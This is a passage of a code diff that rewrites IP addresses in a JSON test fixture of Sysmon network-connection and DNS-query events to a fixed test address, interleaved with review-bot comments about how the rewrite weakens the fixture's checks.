Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" }, "winlog": { @@ -3661,8 +3661,8 @@ "ProcessId": "4", "Initiated": "false", "User": "NT AUTHORITY\\SYSTEM", - "SourceIp": "169.254.255.255", - "DestinationIp": "169.254.180.25", + "SourceIp": "89.160.20.156", + "DestinationIp": "89.160.20.156", "DestinationPort": "137", "Image": "System", "Protocol": "udp", @@ -3755,10 +3755,10 @@ "User": "NT AUTHORITY\\NETWORK SERVICE", "Initiated": "true", "DestinationIsIpv6": "true", - "DestinationIp": "e000:fc:0:0:0:0:0:0", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", - "SourceIp": "a9fe:b419:0:0:f880:2301:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "UtcTime": "2019-03-18 16:57:48.251", "ProcessId": "924", "Image": "C:\\Windows\\System32\\svchost.exe", 
@@ -3773,7 +3773,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
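Review bot: Record 19 now has `SourceIp` and `DestinationIp` both set to `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, so as with the IPv4 records a swapped or cross-copied `source.ip`/`destination.ip` in the pipeline would go unnoticed by this fixture. The removed destination `e000:fc:0:0:0:0:0:0` appears to be a mangled IPv6 value for what an LLMNR query on port 5355 would normally target (the `ff02::1:3` multicast group — presumably; confirm against the capture), so the rewrite also turns a multicast send into a unicast to self. Varying at least the interface-identifier part so the two sides differ — e.g. `DestinationIp` = `2a02:cf40:add:4002::1:3` if that range is what the test GeoIP fixture covers — keeps source and destination distinguishable; the `winlog.event_data` copy of this record in the earlier `@@ -3755` hunk has to carry the same values.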
@@ -3785,7 +3785,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3817,7 +3817,7 @@ "Initiated": "true", "SourceIp": "10.0.2.15", "UtcTime": "2019-03-18 16:57:48.264", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationIsIpv6": "false", "ProcessId": "4", "Protocol": "udp", 
@@ -3893,7 +3893,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3909,7 +3909,7 @@ }, "event_data": { "DestinationIsIpv6": "false", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "User": "NT AUTHORITY\\SYSTEM", "Initiated": "true", 
@@ -3944,7 +3944,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3967,7 +3967,7 @@ "ProcessId": "2736", "QueryName": "api-s2s.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;" + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
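Review bot: The `api-s2s.taboola.com` answer now lists `::ffff:89.160.20.156` four times where it previously held four distinct addresses, so if the pipeline splits `QueryResults` into `dns.resolved_ip`/`related.ip` (not visible here) and de-duplicates, the fixture stops verifying that multiple distinct A records are preserved in order — an expected file regenerated from this input would silently accept a pipeline that keeps only the first answer. Using several different addresses from the supported test set (presumably more than one exists), or at least distinct hosts within one supported block, retains that check while still avoiding unsupported public addresses. The mirrored `winlog.event_data.QueryResults` line in the next hunk must be kept identical to the value inside `event.original`.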
@@ -3990,7 +3990,7 @@ "ProcessId": "2736", "QueryName": "x.bidswitch.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.231.30.22;::ffff:35.196.212.198;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -4019,13 +4019,13 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { "@timestamp": "2021-05-05T15:30:51.701Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 